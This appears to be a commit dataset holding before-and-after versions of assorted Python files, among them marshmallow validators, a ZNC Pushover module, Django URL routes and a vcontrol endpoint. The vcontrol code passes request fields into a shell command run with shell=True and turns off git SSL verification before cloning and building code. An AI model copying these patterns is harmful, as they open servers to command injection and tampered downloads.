is_badword = hebrew.solve(language.is_badword)
assert is_badword("שרמוטה")
assert not is_badword("שימרותה")
is_informal_word = hebrew.solve(language.is_informal_word)
assert is_informal_word("בגללך")
assert not is_informal_word("בגלל")
| from nose.tools import eq_
from .. import language, hebrew
def test_language():
is_misspelled = hebrew.solve(language.is_misspelled)
assert is_misspelled("חטול")
assert not is_misspelled("חתול")
is_badword = hebrew.solve(language.is_badword)
assert is_badword("שרמוטה")
assert not is_badword("שימרותה")
| Python | 0.000037 |
1b75a0e5ee01387c434922b9d0fd23705cbafe9b | Allow empty enums for `OneOf` | marshmallow_jsonschema/validation.py | marshmallow_jsonschema/validation.py | from marshmallow import fields
from .exceptions import UnsupportedValueError
def handle_length(schema, field, validator, parent_schema):
"""Adds validation logic for ``marshmallow.validate.Length``, setting the
values appropriately for ``fields.List``, ``fields.Nested``, and
``fields.String``.
Args:
schema (dict): The original JSON schema we generated. This is what we
want to post-process.
field (fields.Field): The field that generated the original schema and
who this post-processor belongs to.
validator (marshmallow.validate.Length): The validator attached to the
passed in field.
parent_schema (marshmallow.Schema): The Schema instance that the field
belongs to.
Returns:
dict: A, possibly, new JSON Schema that has been post processed and
altered.
Raises:
UnsupportedValueError: Raised if the `field` is something other than
`fields.List`, `fields.Nested`, or `fields.String`
"""
if isinstance(field, fields.String):
minKey = "minLength"
maxKey = "maxLength"
elif isinstance(field, (fields.List, fields.Nested)):
minKey = "minItems"
maxKey = "maxItems"
else:
raise UnsupportedValueError(
"In order to set the Length validator for JSON "
"schema, the field must be either a List, Nested or a String"
)
if validator.min:
schema[minKey] = validator.min
if validator.max:
schema[maxKey] = validator.max
if validator.equal:
schema[minKey] = validator.equal
schema[maxKey] = validator.equal
return schema
def handle_one_of(schema, field, validator, parent_schema):
"""Adds the validation logic for ``marshmallow.validate.OneOf`` by setting
the JSONSchema `enum` property to the allowed choices in the validator.
Args:
schema (dict): The original JSON schema we generated. This is what we
want to post-process.
field (fields.Field): The field that generated the original schema and
who this post-processor belongs to.
validator (marshmallow.validate.OneOf): The validator attached to the
passed in field.
parent_schema (marshmallow.Schema): The Schema instance that the field
belongs to.
Returns:
dict: New JSON Schema that has been post processed and
altered.
"""
schema["enum"] = list(validator.choices)
schema["enumNames"] = list(validator.labels)
return schema
def handle_range(schema, field, validator, parent_schema):
"""Adds validation logic for ``marshmallow.validate.Range``, setting the
values appropriately ``fields.Number`` and it's subclasses.
Args:
schema (dict): The original JSON schema we generated. This is what we
want to post-process.
field (fields.Field): The field that generated the original schema and
who this post-processor belongs to.
validator (marshmallow.validate.Length): The validator attached to the
passed in field.
parent_schema (marshmallow.Schema): The Schema instance that the field
belongs to.
Returns:
dict: A, possibly, new JSON Schema that has been post processed and
altered.
"""
if not isinstance(field, fields.Number):
return schema
if validator.min:
schema["minimum"] = validator.min
if validator.max:
schema["maximum"] = validator.max
return schema
| from marshmallow import fields
from .exceptions import UnsupportedValueError
def handle_length(schema, field, validator, parent_schema):
"""Adds validation logic for ``marshmallow.validate.Length``, setting the
values appropriately for ``fields.List``, ``fields.Nested``, and
``fields.String``.
Args:
schema (dict): The original JSON schema we generated. This is what we
want to post-process.
field (fields.Field): The field that generated the original schema and
who this post-processor belongs to.
validator (marshmallow.validate.Length): The validator attached to the
passed in field.
parent_schema (marshmallow.Schema): The Schema instance that the field
belongs to.
Returns:
dict: A, possibly, new JSON Schema that has been post processed and
altered.
Raises:
UnsupportedValueError: Raised if the `field` is something other than
`fields.List`, `fields.Nested`, or `fields.String`
"""
if isinstance(field, fields.String):
minKey = "minLength"
maxKey = "maxLength"
elif isinstance(field, (fields.List, fields.Nested)):
minKey = "minItems"
maxKey = "maxItems"
else:
raise UnsupportedValueError(
"In order to set the Length validator for JSON "
"schema, the field must be either a List, Nested or a String"
)
if validator.min:
schema[minKey] = validator.min
if validator.max:
schema[maxKey] = validator.max
if validator.equal:
schema[minKey] = validator.equal
schema[maxKey] = validator.equal
return schema
def handle_one_of(schema, field, validator, parent_schema):
    """Post-process *schema* for a ``marshmallow.validate.OneOf`` validator.

    Exposes the validator's allowed choices as the JSON Schema ``enum``
    keyword and their human-readable labels as the (non-standard)
    ``enumNames`` keyword.

    Args:
        schema (dict): JSON schema generated for ``field``; mutated in place.
        field (fields.Field): The field the validator is attached to (unused).
        validator (marshmallow.validate.OneOf): Source of choices and labels.
        parent_schema (marshmallow.Schema): Schema instance owning ``field``.

    Returns:
        dict: The (possibly) updated JSON schema.
    """
    if not validator.choices:
        return schema
    schema["enum"] = list(validator.choices)
    schema["enumNames"] = list(validator.labels)
    return schema
def handle_range(schema, field, validator, parent_schema):
    """Post-process *schema* for a ``marshmallow.validate.Range`` validator.

    Copies the validator's bounds onto the JSON Schema ``minimum``/``maximum``
    keywords for ``fields.Number`` and its subclasses; any other field type
    is returned untouched.

    Args:
        schema (dict): JSON schema generated for ``field``; mutated in place.
        field (fields.Field): The field the validator is attached to.
        validator (marshmallow.validate.Range): Range constraint to apply.
        parent_schema (marshmallow.Schema): Schema instance owning ``field``.

    Returns:
        dict: The (possibly) updated JSON schema.
    """
    if not isinstance(field, fields.Number):
        return schema
    # Compare against None explicitly: Range's unset bounds default to None,
    # and a bound of 0 is falsy yet still a real constraint -- the previous
    # truthiness test silently dropped "minimum: 0" / "maximum: 0".
    if validator.min is not None:
        schema["minimum"] = validator.min
    if validator.max is not None:
        schema["maximum"] = validator.max
    return schema
| Python | 0.000011 |
eb71d45097e509273518b83113489911bf985e4a | clean up | mcpipy/test/builders/test_protein.py | mcpipy/test/builders/test_protein.py | import pandas as pd
from cellcraft.builders.protein import define_items_color_texture_protein, store_location_biological_prot_data
def test_define_items_color_texture_protein():
    # Two chains mapped to distinct ids should produce two appearance
    # entries with distinguishable colors.
    chains = {"a": 1, "b": 2}
    appearance = define_items_color_texture_protein(chains)
    assert len(appearance) == 2
    assert appearance[1]['color'] != appearance[2]['color']
| import pandas as pd
from cellcraft.builders.protein import define_items_color_texture_protein, store_location_biological_prot_data
def test_define_items_color_texture_protein():
dict_chains = {"a": 1, "b": 2}
d_appearance = define_items_color_texture_protein(dict_chains)
assert len(d_appearance) == 2
assert d_appearance[1]['color'] != d_appearance[2]['color']
def test_store_location_biological_prot_data():
complex_coordinates = pd.Series([0.03, 0.45, 0.23])
name = '1jsu'
data_dict = store_location_biological_prot_data(complex_coordinates, name) | Python | 0.000001 |
237f85009e2d8669e75c1e7e9ae3940efe7a151d | update vetn version and pull recursively | vcontrol/rest/machines/create.py | vcontrol/rest/machines/create.py | from ..helpers import get_allowed
import ast
import json
import os
import subprocess
import web
class CreateMachineR:
    """
    This endpoint is for creating a new machine of Vent on a provider.

    POST expects a dict-like body with at least 'provider', 'machine',
    'iso', 'cpus', 'disk_size' and 'memory' keys; 'group' and 'labels'
    (comma-separated) are optional.  The provider name must match an entry
    in the local providers.txt file.
    """
    allow_origin, rest_url = get_allowed.get_allowed()

    def OPTIONS(self):
        # CORS preflight requests are answered exactly like POST.
        return self.POST()

    def POST(self):
        # Local import: needed for the virtualbox cleanup path below.
        # (Previously shutil was referenced without being imported, which
        # raised NameError whenever the cleanup branch actually ran.)
        import shutil
        web.header('Access-Control-Allow-Origin', self.allow_origin)
        web.header('Access-Control-Allow-Headers', "Content-type")
        data = web.data()
        payload = {}
        try:
            # Body may be a python-literal dict, or a JSON string wrapping one.
            payload = ast.literal_eval(data)
            if not isinstance(payload, dict):
                payload = ast.literal_eval(json.loads(data))
        except Exception:
            return "malformed json body"
        # TODO add --engine-label(s) vent specific labels
        engine_labels = "--engine-label vcontrol_managed=yes "
        try:
            if not os.path.isfile('providers.txt'):
                return "no providers, please first add a provider"
            with open('providers.txt', 'r') as f:
                for line in f:
                    parts = line.split(":")
                    if parts[0] != payload['provider']:
                        continue
                    # add --engine-label for group specified in payload
                    if "group" in payload:
                        engine_labels += "--engine-label vcontrol_group="+payload["group"]+" "
                    # !! TODO add any additional --engine-label(s) in payload
                    if "labels" in payload and payload["labels"] != "":
                        for label in payload["labels"].split(","):
                            engine_labels += "--engine-label "+label+" "
                    proc = None
                    cleanup = False
                    # NOTE(security): cmd is interpolated from the request body
                    # and executed with shell=True; callers must be trusted.
                    # TODO harden by building an argument list instead.
                    if parts[1] == 'openstack' or parts[1] == 'vmwarevsphere':
                        # TODO check usage stats first and make sure it's not over the limits (capacity)
                        cmd = "/usr/local/bin/docker-machine create "+engine_labels+"-d "+parts[1]+" "+parts[5].strip()
                        if parts[1] == 'vmwarevsphere':
                            if payload['iso'] == '/tmp/vent/vent.iso':
                                cmd += ' --vmwarevsphere-boot2docker-url=https://github.com/CyberReboot/vent/releases/download/v0.1.1/vent.iso'
                            else:
                                cmd += ' --vmwarevsphere-boot2docker-url='+payload['iso']
                    elif parts[1].strip() == "virtualbox":
                        cmd = "/usr/local/bin/docker-machine create "+engine_labels+"-d "+parts[1].strip()
                        if payload['iso'] == '/tmp/vent/vent.iso':
                            if not os.path.isfile('/tmp/vent/vent.iso'):
                                # Build the vent iso once, then serve it over a
                                # throwaway local HTTP server for docker-machine.
                                cleanup = True
                                os.system("git config --global http.sslVerify false")
                                os.system("cd /tmp && git clone --recursive https://github.com/CyberReboot/vent.git")
                                os.system("cd /tmp/vent && make")
                            proc = subprocess.Popen(["nohup", "python", "-m", "SimpleHTTPServer"], cwd="/tmp/vent")
                            cmd += ' --virtualbox-boot2docker-url=http://localhost:8000/vent.iso'
                        cmd += ' --virtualbox-cpu-count "'+str(payload['cpus'])+'" --virtualbox-disk-size "'+str(payload['disk_size'])+'" --virtualbox-memory "'+str(payload['memory'])+'"'
                    else:
                        cmd = "/usr/local/bin/docker-machine create "+engine_labels+"-d "+parts[1]+" "+parts[2].strip()
                        if parts[1] == "vmwarevsphere":
                            cmd += ' --vmwarevsphere-cpu-count "'+str(payload['cpus'])+'" --vmwarevsphere-disk-size "'+str(payload['disk_size'])+'" --vmwarevsphere-memory-size "'+str(payload['memory'])+'"'
                    cmd += ' '+payload['machine']
                    output = subprocess.check_output(cmd, shell=True)
                    if proc is not None:
                        # Stop the temporary iso HTTP server.
                        os.system("kill -9 "+str(proc.pid))
                    if cleanup:
                        shutil.rmtree('/tmp/vent')
                    return output
                return "provider specified was not found"
        except Exception:
            return "unable to create machine"
| from ..helpers import get_allowed
import ast
import json
import os
import subprocess
import web
class CreateMachineR:
"""
This endpoint is for creating a new machine of Vent on a provider.
"""
allow_origin, rest_url = get_allowed.get_allowed()
def OPTIONS(self):
return self.POST()
def POST(self):
web.header('Access-Control-Allow-Origin', self.allow_origin)
web.header('Access-Control-Allow-Headers', "Content-type")
data = web.data()
payload = {}
try:
payload = ast.literal_eval(data)
if type(payload) != dict:
payload = ast.literal_eval(json.loads(data))
except:
return "malformed json body"
# TODO add --engine-label(s) vent specific labels
engine_labels = "--engine-label vcontrol_managed=yes "
try:
if os.path.isfile('providers.txt'):
with open('providers.txt', 'r') as f:
for line in f:
if line.split(":")[0] == payload['provider']:
# add --engine-label for group specified in payload
if "group" in payload:
engine_labels += "--engine-label vcontrol_group="+payload["group"]+" "
# !! TODO add any additional --engine-label(s) in payload
if "labels" in payload:
if payload["labels"] != "":
labels = payload["labels"].split(",")
for label in labels:
engine_labels += "--engine-label "+label+" "
proc = None
cleanup = False
if line.split(":")[1] == 'openstack' or line.split(":")[1] == 'vmwarevsphere':
# TODO check usage stats first and make sure it's not over the limits (capacity)
cmd = "/usr/local/bin/docker-machine create "+engine_labels+"-d "+line.split(":")[1]+" "+line.split(":")[5].strip()
if line.split(":")[1] == 'vmwarevsphere':
if payload['iso'] == '/tmp/vent/vent.iso':
cmd += ' --vmwarevsphere-boot2docker-url=https://github.com/CyberReboot/vent/releases/download/v0.1.0/vent.iso'
else:
cmd += ' --vmwarevsphere-boot2docker-url='+payload['iso']
elif line.split(":")[1].strip() == "virtualbox":
cmd = "/usr/local/bin/docker-machine create "+engine_labels+"-d "+line.split(":")[1].strip()
if payload['iso'] == '/tmp/vent/vent.iso':
if not os.path.isfile('/tmp/vent/vent.iso'):
cleanup = True
os.system("git config --global http.sslVerify false")
os.system("cd /tmp && git clone https://github.com/CyberReboot/vent.git")
os.system("cd /tmp/vent && make")
proc = subprocess.Popen(["nohup", "python", "-m", "SimpleHTTPServer"], cwd="/tmp/vent")
cmd += ' --virtualbox-boot2docker-url=http://localhost:8000/vent.iso'
cmd += ' --virtualbox-cpu-count "'+str(payload['cpus'])+'" --virtualbox-disk-size "'+str(payload['disk_size'])+'" --virtualbox-memory "'+str(payload['memory'])+'"'
else:
cmd = "/usr/local/bin/docker-machine create "+engine_labels+"-d "+line.split(":")[1]+" "+line.split(":")[2].strip()
if line.split(":")[1] == "vmwarevsphere":
cmd += ' --vmwarevsphere-cpu-count "'+str(payload['cpus'])+'" --vmwarevsphere-disk-size "'+str(payload['disk_size'])+'" --vmwarevsphere-memory-size "'+str(payload['memory'])+'"'
cmd += ' '+payload['machine']
output = subprocess.check_output(cmd, shell=True)
if proc != None:
os.system("kill -9 "+str(proc.pid))
if cleanup:
shutil.rmtree('/tmp/vent')
return output
return "provider specified was not found"
else:
return "no providers, please first add a provider"
except:
return "unable to create machine"
| Python | 0 |
be929d518ff320ed8e16f57da55f0855800f7408 | Use mutli_reduce instead of reduce in enum file loading | src/engine/file_loader.py | src/engine/file_loader.py | import os
import json
from lib import contract, functional
data_dir = os.path.join(os.environ['PORTER'], 'data')
@contract.accepts(str)
@contract.returns(list)
def read_and_parse_json(data_type):
    """Load every ``*.json`` file under ``<data_dir>/<data_type>``.

    Returns a list holding the parsed contents of each JSON file, in
    ``os.listdir`` order.
    """
    type_dir = os.path.join(data_dir, data_type)
    def to_abs(name):
        return os.path.join(type_dir, name)
    def is_json(name):
        return name.endswith('.json')
    def parse(path):
        with open(path) as handle:
            return json.load(handle)
    return map(parse, filter(is_json, map(to_abs, os.listdir(type_dir))))
@contract.accepts(str)
@contract.returns(dict)
def load_enum(struct_name):
    """Build a name -> ordinal mapping from the first JSON file of *struct_name*.

    Only the first parsed document is used; each of its entries is keyed by
    its string form and mapped to its 0-based position in the sequence.
    """
    def create_enum_map(enum_map, enumeration, enum_type):
        # Accumulator step: record the position of each enum value.
        enum_map[str(enum_type)] = enumeration
        return enum_map
    # multi_reduce presumably unpacks each (index, value) pair produced by
    # enumerate() into the reducer's trailing arguments -- defined in
    # lib.functional; verify there if the contract changes.
    return functional.multi_reduce(
        create_enum_map, enumerate(read_and_parse_json(struct_name)[0]), {})
@contract.accepts(str)
@contract.returns(dict)
def load_struct(struct_name):
    """Index every parsed JSON document of *struct_name* by its 'name' field."""
    struct_map = {}
    for struct_ in read_and_parse_json(struct_name):
        struct_map[str(struct_['name'])] = struct_
    return struct_map
| import os
import json
from lib import contract
data_dir = os.path.join(os.environ['PORTER'], 'data')
@contract.accepts(str)
@contract.returns(list)
def read_and_parse_json(data_type):
sub_dir = os.path.join(data_dir, data_type)
def full_path(file_name):
return os.path.join(sub_dir, file_name)
def only_json(file_name):
return file_name.endswith('.json')
def load_json(json_file_name):
with open(json_file_name) as json_file:
return json.load(json_file)
return map(load_json, filter(only_json, map(full_path, os.listdir(sub_dir))))
@contract.accepts(str)
@contract.returns(dict)
def load_enum(struct_name):
def create_enum_map(enum_map, args):
enumeration, enum_type = args
enum_map[str(enum_type)] = enumeration
return enum_map
return reduce(create_enum_map, enumerate(read_and_parse_json(struct_name)[0]), {})
@contract.accepts(str)
@contract.returns(dict)
def load_struct(struct_name):
def create_struct_map(struct_map, struct_):
struct_map[str(struct_['name'])] = struct_
return struct_map
return reduce(create_struct_map, read_and_parse_json(struct_name), {})
| Python | 0 |
ecc21e3fccc41413686389735da93e0488779cc4 | Add a test command | pypush.py | pypush.py | # Simple Push Python Module
import znc
import re
import http.client, urllib
import traceback
class pypush(znc.Module):
    """ZNC module that forwards IRC highlights and private messages to the
    Pushover notification service.

    Configuration lives in ZNC's per-module registry (``self.nv``):
    'token' / 'user' are the Pushover API credentials and 'highlight' is a
    space-separated list of extra trigger words.
    """
    module_types = [znc.CModInfo.UserModule]
    description = "Push python3 module for ZNC"
    def OnLoad(self, sArgs, sMessage):
        # self.nick doubles as a cache key: Highlight() rebuilds its regex
        # whenever the current nick no longer matches this value.
        self.nick = ''
        self.debug = False
        return znc.CONTINUE
    def PutModuleDbg(self, s):
        # Echo s to the module window only while debug mode is toggled on.
        if self.debug:
            self.PutModule(s)
    def PushMsg(self, title, msg):
        """Send one notification to the Pushover REST API (blocking)."""
        self.PutModuleDbg("{0} -- {1}".format(title, msg))
        conn = http.client.HTTPSConnection("api.pushover.net:443")
        conn.request("POST", "/1/messages.json",
            urllib.parse.urlencode({
                "token": self.nv['token'],
                "user": self.nv['user'],
                "title": title,
                "message": msg,
            }), { "Content-type": "application/x-www-form-urlencoded" })
        conn.getresponse()
    def Highlight(self, message):
        """Return a truthy match if *message* mentions our nick or any
        configured highlight word (case-insensitive, whole words only)."""
        if self.nick != self.GetNetwork().GetCurNick():
            # Nick changed (or first call): recompile the search regex.
            self.nick = self.GetNetwork().GetCurNick()
            words = [self.nick, ] + self.nv['highlight'].split()
            self.HighlightRE = re.compile(r'\b({0})\b'.format('|'.join(words)), flags=re.IGNORECASE).search
        return self.HighlightRE(message)
    def OnChanMsg(self, nick, channel, message):
        # Channel traffic only notifies when it matches the highlight regex.
        if self.Highlight(message.s):
            self.PushMsg("Highlight", "{0}: [{1}] {2}".format(channel.GetName(), nick.GetNick(), message.s))
        return znc.CONTINUE
    def OnPrivMsg(self, nick, message):
        # Every private message is pushed unconditionally.
        self.PushMsg("Private", "[{0}] {1}".format(nick.GetNick(), message.s))
        return znc.CONTINUE
    def OnModCommand(self, commandstr):
        """Dispatch a module command to the matching DoCommand_* handler."""
        argv = commandstr.split()
        try:
            self.PutModule("Command!! {0}".format(argv))
            method = getattr(self, "DoCommand_" + argv[0].replace('-','_').lower(), self.DoCommandNotUnderstood)
            method(argv)
        except Exception:
            self.PutModule("Command Exception!! {0} -> {1}".format(argv, traceback.format_exc()))
        return znc.CONTINUE
    def DoCommandNotUnderstood(self, argv):
        # Fallback used when no DoCommand_* attribute matches the command.
        self.PutModule("Command Not Understood: {0}".format(argv))
    def DoCommand_setuser(self, argv):
        try:
            self.nv['user'] = argv[1]
            self.PutModule("Pushover user set")
        except Exception:
            self.PutModule("SetUser requires a Pushover user string");
    def DoCommand_settoken(self, argv):
        try:
            self.nv['token'] = argv[1]
            self.PutModule("Pushover token set")
        except Exception:
            self.PutModule("SetToken requires a Pushover token string");
    def DoCommand_sethighlight(self, argv):
        # Store the extra trigger words as one space-joined string.
        self.nv['highlight'] = ' '.join(argv[1:])
        self.nick = '' # unset the nick to regenerate the re
    def DoCommand_debug(self, argv):
        self.debug = not self.debug
        self.PutModule("Debug {0}".format(self.debug));
    def DoCommand_test(self, argv):
        # Push the raw command back to ourselves to verify the credentials.
        self.PushMsg("Test", "{0}".format(' '.join(argv[0:])))
        return znc.CONTINUE
| # Simple Push Python Module
import znc
import re
import http.client, urllib
import traceback
class pypush(znc.Module):
module_types = [znc.CModInfo.UserModule]
description = "Push python3 module for ZNC"
def OnLoad(self, sArgs, sMessage):
self.nick = ''
self.debug = False
return znc.CONTINUE
def PutModuleDbg(self, s):
if self.debug:
self.PutModule(s)
def PushMsg(self, title, msg):
self.PutModuleDbg("{0} -- {1}".format(title, msg))
conn = http.client.HTTPSConnection("api.pushover.net:443")
conn.request("POST", "/1/messages.json",
urllib.parse.urlencode({
"token": self.nv['token'],
"user": self.nv['user'],
"title": title,
"message": msg,
}), { "Content-type": "application/x-www-form-urlencoded" })
conn.getresponse()
def Highlight(self, message):
if self.nick != self.GetNetwork().GetCurNick():
self.nick = self.GetNetwork().GetCurNick()
words = [self.nick, ] + self.nv['highlight'].split()
self.HighlightRE = re.compile(r'\b({0})\b'.format('|'.join(words)), flags=re.IGNORECASE).search
return self.HighlightRE(message)
def OnChanMsg(self, nick, channel, message):
if self.Highlight(message.s):
self.PushMsg("Highlight", "{0}: [{1}] {2}".format(channel.GetName(), nick.GetNick(), message.s))
return znc.CONTINUE
def OnPrivMsg(self, nick, message):
self.PushMsg("Private", "[{0}] {1}".format(nick.GetNick(), message.s))
return znc.CONTINUE
def OnModCommand(self, commandstr):
argv = commandstr.split()
try:
self.PutModule("Command!! {0}".format(argv))
method = getattr(self, "DoCommand_" + argv[0].replace('-','_').lower(), self.DoCommandNotUnderstood)
method(argv)
except Exception:
self.PutModule("Command Exception!! {0} -> {1}".format(argv, traceback.format_exc()))
return znc.CONTINUE
def DoCommandNotUnderstood(self, argv):
self.PutModule("Command Not Understood: {0}".format(argv))
def DoCommand_setuser(self, argv):
try:
self.nv['user'] = argv[1]
self.PutModule("Pushover user set")
except Exception:
self.PutModule("SetUser requires a Pushover user string");
def DoCommand_settoken(self, argv):
try:
self.nv['token'] = argv[1]
self.PutModule("Pushover token set")
except Exception:
self.PutModule("SetToken requires a Pushover token string");
def DoCommand_sethighlight(self, argv):
self.nv['highlight'] = ' '.join(argv[1:])
self.nick = '' # unset the nick to regenerate the re
def DoCommand_debug(self, argv):
self.debug = not self.debug
self.PutModule("Debug {0}".format(self.debug));
| Python | 0.000797 |
9d74f2ebfc0a635026544a977380593e90b4150d | upgrade (goflow.workflow indepency) | leavedemo/urls.py | leavedemo/urls.py | from django.conf.urls.defaults import *
from django.conf import settings
from leave.forms import StartRequestForm, RequesterForm, CheckRequestForm
from os.path import join, dirname
_dir = join(dirname(__file__))
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
# FOR DEBUG AND TEST ONLY
(r'^.*/accounts/login.*switch/(?P<username>.*)/(?P<password>.*)/$', 'goflow.workflow.views.debug_switch_user', {'redirect':'/leave/'}),
(r'^.*/switch/(?P<username>.*)/(?P<password>.*)/$', 'goflow.workflow.views.debug_switch_user'),
# user connection
(r'^.*/logout/$', 'django.contrib.auth.views.logout'),
(r'^.*/accounts/login/$', 'django.contrib.auth.views.login', {'template_name':'goflow/login.html'}),
(r'^.*/password_change/$', 'django.contrib.auth.views.password_change'),
# static
(r'^images/(?P<path>.*)$', 'django.views.static.serve', {'document_root': join(_dir, 'media/img'), 'show_indexes': True}),
(r'^files/(.*)$', 'django.views.static.serve', {'document_root': settings.MEDIA_ROOT}),
# home redirection
(r'^.*/home/$', 'django.views.generic.simple.redirect_to', {'url':'/leave/'}),
# home page
(r'^leave/$', 'django.views.generic.simple.direct_to_template', {'template':'leave.html'}),
# starting application
(r'^leave/start/$', 'goflow.apptools.views.start_application', {'process_name':'leave',
'form_class':StartRequestForm,
'template':'start_leave.html'}),
# applications
(r'^leave/checkstatus/(?P<id>.*)/$', 'goflow.apptools.views.edit_model', {'form_class':CheckRequestForm,
'template':'checkstatus.html'}),
(r'^leave/checkstatus_auto/$', 'leavedemo.leave.views.checkstatus_auto', {'notif_user':True}),
(r'^leave/refine/(?P<id>.*)/$', 'goflow.apptools.views.edit_model', {'form_class':RequesterForm,
'template':'refine.html'}),
(r'^leave/approvalform/(?P<id>.*)/$', 'goflow.apptools.views.edit_model', {'form_class':CheckRequestForm,
'template':'approval.html'}),
(r'^leave/hrform/(?P<id>.*)/$', 'goflow.apptools.views.view_application', {'template':'hrform.html'}),
(r'^leave/hr_auto/$', 'leavedemo.leave.auto.update_hr'),
(r'^leave/finalinfo/(?P<id>.*)/$', 'goflow.apptools.views.view_application', {'template':'finalinfo.html'}),
# administration
(r'^leave/admin/workflow/', include('goflow.apptools.urls_admin')),
(r'^leave/admin/graphics2/', include('goflow.graphics2.urls_admin')),
(r'^leave/admin/(.*)', admin.site.root),
# Goflow pages
(r'^leave/', include('goflow.urls')),
(r'^leave/send_mail/$', 'goflow.workflow.notification.send_mail'),
)
| from django.conf.urls.defaults import *
from django.conf import settings
from leave.forms import StartRequestForm, RequesterForm, CheckRequestForm
from os.path import join, dirname
_dir = join(dirname(__file__))
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
# FOR DEBUG AND TEST ONLY
(r'^.*/accounts/login.*switch/(?P<username>.*)/(?P<password>.*)/$', 'goflow.workflow.views.debug_switch_user', {'redirect':'/leave/'}),
(r'^.*/switch/(?P<username>.*)/(?P<password>.*)/$', 'goflow.workflow.views.debug_switch_user'),
# user connection
(r'^.*/logout/$', 'django.contrib.auth.views.logout'),
(r'^.*/accounts/login/$', 'django.contrib.auth.views.login', {'template_name':'goflow/login.html'}),
(r'^.*/password_change/$', 'django.contrib.auth.views.password_change'),
# static
(r'^images/(?P<path>.*)$', 'django.views.static.serve', {'document_root': join(_dir, 'media/img'), 'show_indexes': True}),
(r'^files/(.*)$', 'django.views.static.serve', {'document_root': settings.MEDIA_ROOT}),
# home redirection
(r'^.*/home/$', 'django.views.generic.simple.redirect_to', {'url':'/leave/'}),
# home page
(r'^leave/$', 'django.views.generic.simple.direct_to_template', {'template':'leave.html'}),
# starting application
(r'^leave/start/$', 'goflow.apptools.views.start_application', {'process_name':'leave',
'form_class':StartRequestForm,
'template':'start_leave.html'}),
# applications
(r'^leave/checkstatus/(?P<id>.*)/$', 'goflow.apptools.views.edit_model', {'form_class':CheckRequestForm,
'template':'checkstatus.html'}),
(r'^leave/checkstatus_auto/$', 'leavedemo.leave.views.checkstatus_auto', {'notif_user':True}),
(r'^leave/refine/(?P<id>.*)/$', 'goflow.apptools.views.edit_model', {'form_class':RequesterForm,
'template':'refine.html'}),
(r'^leave/approvalform/(?P<id>.*)/$', 'goflow.apptools.views.edit_model', {'form_class':CheckRequestForm,
'template':'approval.html'}),
(r'^leave/hrform/(?P<id>.*)/$', 'goflow.apptools.views.view_application', {'template':'hrform.html'}),
(r'^leave/hr_auto/$', 'leavedemo.leave.auto.update_hr'),
(r'^leave/finalinfo/(?P<id>.*)/$', 'goflow.apptools.views.view_application', {'template':'finalinfo.html'}),
# administration
(r'^leave/admin/workflow/', include('goflow.urls_admin')),
(r'^leave/admin/graphics2/', include('goflow.graphics2.urls_admin')),
(r'^leave/admin/(.*)', admin.site.root),
# Goflow pages
(r'^leave/', include('goflow.urls')),
(r'^leave/send_mail/$', 'goflow.workflow.notification.send_mail'),
)
| Python | 0 |
1df66cc442e93d85fd8a8bbab2815574387a8952 | Remove print | doc/examples/brain_extraction_dwi.py | doc/examples/brain_extraction_dwi.py | """
=================================================
Brain segmentation with dipy.segment.mask.
=================================================
We show how to extract brain information and mask from a b0 image using dipy's
segment.mask module.
First import the necessary modules:
"""
import os.path
import numpy as np
import nibabel as nib
"""
Download and read the data for this tutorial.
The scil_b0 dataset contains different data from different companies and models.
For this example, the data comes from a 3 tesla GE MRI.
"""
from dipy.data import fetch_scil_b0, read_scil_b0
fetch_scil_b0()
img = read_scil_b0()
data = np.squeeze(img.get_data())
"""
img contains a nibabel Nifti1Image object. Data is the actual brain data as a
numpy ndarray.
Segment the brain using dipy's mask module.
`medotsu` returns the segmented brain data and a binary mask of the brain.
It is possible to fine tune `medotsu`'s parameters (median_radius and
num_pass) if extraction yields incorrect results, but the default parameters work
well on most volumes. For this example, default parameters (4, 4) will be used.
"""
from dipy.segment.mask import medotsu
b0_mask, mask = medotsu(data.copy(), 4, 4)
"""
Saving the segmentation results is very easy using nibabel. We need the b0_mask,
and the binary mask volumes. The affine matrix which transform the image's
coordinates to the world coordinates is also needed. Here, we choose to save
both images in float32.
"""
mask_img = nib.Nifti1Image(mask.astype(np.float32), img.get_affine())
b0_img = nib.Nifti1Image(b0_mask.astype(np.float32), img.get_affine())
fname = './ge_3t'
nib.save(mask_img, fname+'_binary_mask.nii.gz')
nib.save(b0_img, fname+'_mask.nii.gz')
"""
Quick view of the results middle slice using matplotlib.
"""
import matplotlib.pyplot as plt
slice = data.shape[2]/2
plt.figure('Brain segmentation')
plt.subplot(1,2,1)
plt.imshow(data[:,:,slice])
plt.subplot(1,2,2)
plt.imshow(b0_mask[:,:,slice])
plt.show()
"""
`medotsu` can also automatically crop the outputs to remove the largest possible
number of background voxels. This makes the output data significantly smaller.
`medotsu`'s auto cropping is activated by setting the autocrop parameter to True.
"""
b0_mask_crop, mask_crop = medotsu(data.copy(), 4, 4, autocrop=True)
"""
Saving cropped data using nibabel as demonstrated previously.
"""
mask_img_crop = nib.Nifti1Image(mask_crop.astype(np.float32), img.get_affine())
b0_img_crop = nib.Nifti1Image(b0_mask_crop.astype(np.float32), img.get_affine())
nib.save(mask_img_crop, fname+'_binary_mask_crop.nii.gz')
nib.save(b0_img_crop, fname+'_mask_crop.nii.gz')
| """
=================================================
Brain segmentation with dipy.segment.mask.
=================================================
We show how to extract brain information and mask from a b0 image using dipy's
segment.mask module.
First import the necessary modules:
"""
import os.path
import numpy as np
import nibabel as nib
"""
Download and read the data for this tutorial.
The scil_b0 dataset contains different data from different companies and models.
For this example, the data comes from a 3 tesla GE MRI.
"""
from dipy.data import fetch_scil_b0, read_scil_b0
fetch_scil_b0()
img = read_scil_b0()
data = np.squeeze(img.get_data())
"""
img contains a nibabel Nifti1Image object. Data is the actual brain data as a
numpy ndarray.
Segment the brain using dipy's mask module.
`medostu` returns the segmented brain data an a binary mask of the brain.
It is possible to fine tune the `medotsu`'s parameters (median_radius and
num_pass) if extraction yields incorrect results but the default parameters work
well on most volumes. For this example, default parameters (4, 4) will be used.
"""
print('Segmenting brain data from GE 3T b0 volume...')
from dipy.segment.mask import medotsu
b0_mask, mask = medotsu(data.copy(), 4, 4)
"""
Saving the segmentation results is very easy using nibabel. We need the b0_mask,
and the binary mask volumes. The affine matrix which transform the image's
coordinates to the world coordinates is also needed. Here, we choose to save
both images in float32.
"""
mask_img = nib.Nifti1Image(mask.astype(np.float32), img.get_affine())
b0_img = nib.Nifti1Image(b0_mask.astype(np.float32), img.get_affine())
fname = './ge_3t'
